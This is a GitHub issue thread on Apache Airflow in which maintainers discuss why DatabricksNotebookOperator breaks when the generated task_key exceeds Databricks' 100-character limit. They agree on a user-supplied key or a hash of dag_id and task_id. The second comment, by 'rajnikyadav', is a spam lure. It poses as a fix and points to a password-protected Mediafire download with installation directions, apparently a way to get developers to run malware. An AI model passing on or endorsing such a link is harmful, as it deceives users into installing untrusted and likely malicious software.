### ISSUE TITLE
`DatabricksNotebookOperator` fails when task_key is longer than 100 characters

### ISSUE THREAD

**Issue by rawwar** [apache/airflow#41816]
### Apache Airflow version

main (development)

### What happened?

According to the Databricks API documentation, task_key has a max length of 100: [Link](https://docs.databricks.com/api/workspace/jobs/getrun#tasks-task_key) .

When the Dag ID and task ID strings are long enough, we create a task_key with more than 100 characters. However, this limit does not affect during job creation. Job gets created with the full name. But, when fetching using the job run details using [getrun](https://docs.databricks.com/api/workspace/jobs/getrun#tasks-task_key) endpoint, it truncates the task_key. This is causing issue in the following line of code to cause key error: [Link](https://github.com/apache/airflow/blob/c018a479546ccc5d46eaf6c9aaf68f0d98f330cd/airflow/providers/databricks/operators/databricks.py#L1067)

### What you think should happen instead?

task key should be unique. Hence, we can include an uuid, instead of using dag_id+task_id

### How to reproduce

have a dag_id and task_id names to be longer than 100 characters together and use DatabricksNotebookOperator

### Operating System

Debian GNU/Linux 12 (bookworm)

### Versions of Apache Airflow Providers

apache-airflow-providers-databricks==6.8.0

### Deployment

Astronomer

### Are you willing to submit PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eladkal** [comment]
If there is a 100 limit why Databricks don't raise error when you create the notebook?

>  However, this limit does not affect during job creation

This feels more like a feature request to Databricks.
If the API call return exception Airflow will notify users about the problem if they don't then this is not really Airflow problem.
We should avoid trying to solve services problems within Airflow.
If Databricks decides to change the limit to 200 or 50. What then? We will need to release a new version of the provider to accommodate. What about all the users who run previous versions?

**Comment by Lee-W** [comment]
I agree with @eladkal. This should be a feature request to Databricks, but we could have a workaround like @rawwar suggests. WDYT?

**Comment by rawwar** [comment]
@eladkal, That makes sense. But this case still needs to be handled on the Airflow side as well since we want a way to track the job. I have a few suggestions here.

suggestions:
- Clearly mention in the documentation and also print logs when the task_key is beyond 100 characters for now
- Prefix task_key with a unique identifier so that we can just do a prefix match when searching for the task
- Instead of dag_id+task_id as the task key, we can use a [5-10] digit UUID that should be sufficiently unique.
-

**Comment by Lee-W** [comment]
@rawwar I think we at least can do `Clearly mention in the documentation and also print logs when the task_key is beyond 100 characters for now`. I'm thinking of making `Instead of dag_id+task_id as the task key, we can use a [5-10] digit UUID that should be sufficiently unique.` optional feature? some users might expect it to be `dag_id+task_id`.

**Comment by potiuk** [comment]
Warning when it happens is already merged. Should we keep that issue open ? Or should we close it after this is addressed better - everyone?

**Comment by rawwar** [comment]
If we agree on an approach, I can work on this one. So far, I like the idea of the task key being passed by the user. If user doesn't provide one, we generate a random id(possibly by using an uuid)

**Comment by potiuk** [comment]
Assigned to you - I ije the idea too.

**Comment by pankajkoti** [comment]
Another idea I have @rawwar is to check if we can compute a hash of the task ID built using the current combination of DAG ID task ID instead of a completely random UUID. If we generate a random UUID, we would also need to store that against each task so that it can be monitored accordingly

**Comment by rawwar** [comment]
> Another idea I have @rawwar is to check if we can compute a hash of the task ID built using the current combination of DAG ID task ID instead of a completely random UUID. If we generate a random UUID, we would also need to store that against each task so that it can be monitored accordingly

Yeah, I think that's better. I will just encode it using base64

**Comment by potiuk** [comment]
Agreed

**Comment by hardeybisey** [comment]
@rawwar please assign to me, thanks.

**Comment by hardeybisey** [comment]
Thanks @rawwar.  Just confirming my understanding with the fix that needs to be added is to compute a hash of the dag_id+task_id as the task_key if a user doesn't not provide one. Is that correct?

**Comment by rawwar** [comment]
@hardeybisey , Yes. You can also refer to PR  https://github.com/apache/airflow/pull/43106.
